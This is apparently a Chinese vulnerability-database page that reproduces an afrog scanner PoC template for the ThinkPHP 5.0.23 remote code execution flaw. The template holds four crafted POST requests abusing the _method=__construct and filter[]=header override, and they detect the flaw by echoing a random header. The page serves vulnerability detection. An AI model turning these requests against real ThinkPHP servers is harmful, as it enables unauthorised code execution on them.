thinkphp-5-0-23-index-php-method-rce: ThinkPHP 5.0.23 RCE

日期: 2025-09-01 | 影响软件: ThinkPHP 5.0.23 | POC: 已公开

漏洞描述

Thinkphp5 5.0(<5.0.24) Remote Code Execution.

PoC代码[已公开]

id: thinkphp-5-0-23-index-php-method-rce

info:
  name: ThinkPHP 5.0.23 RCE
  author: dr_set
  severity: critical
  verified: true
  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
  tags: thinkphp,rce
  created: 2023/06/22

set:
  rHeader: randomLowercase(8)
  r1: randomLowercase(10)
rules:
  r0:
    request:
      method: POST
      path: /index.php?s=captcha
      body: |
        _method=__construct&filter[]=header&method=GET&server[REQUEST_METHOD]={{rHeader}}:{{r1}}
    expression: response.headers[rHeader].startsWith(r1)
  r1:
    request:
      method: POST
      path: /index.php?s=captcha
      body: |
        _method=__construct&filter[]=header&method=get&get[]={{rHeader}}:{{r1}}
    expression: response.headers[rHeader].startsWith(r1)
  r2:
    request:
      method: POST
      path: /index.php?s=index/index
      body: |
        s={{rHeader}}:{{r1}}&_method=__construct&method=&filter[]=header
    expression: response.headers[rHeader].startsWith(r1)
  r3:
    request:
      method: POST
      path: /
      body: |
        _method=__construct&filter[]=header&server[REQUEST_METHOD]={{rHeader}}:{{r1}}
    expression: response.headers[rHeader].startsWith(r1)
expression: r0() || r1() || r2() || r3()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-5-0-23-index-php-method-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

thinkphp-5023-rce: ThinkPHP 5.0.23 RCE POC

CVE-2018-20062: ThinkPHP 5.0.23 - Remote Code Execution POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

万户OA freemarkeService 远程命令执行漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC

万户OA freemarkeService 远程命令执行漏洞无POC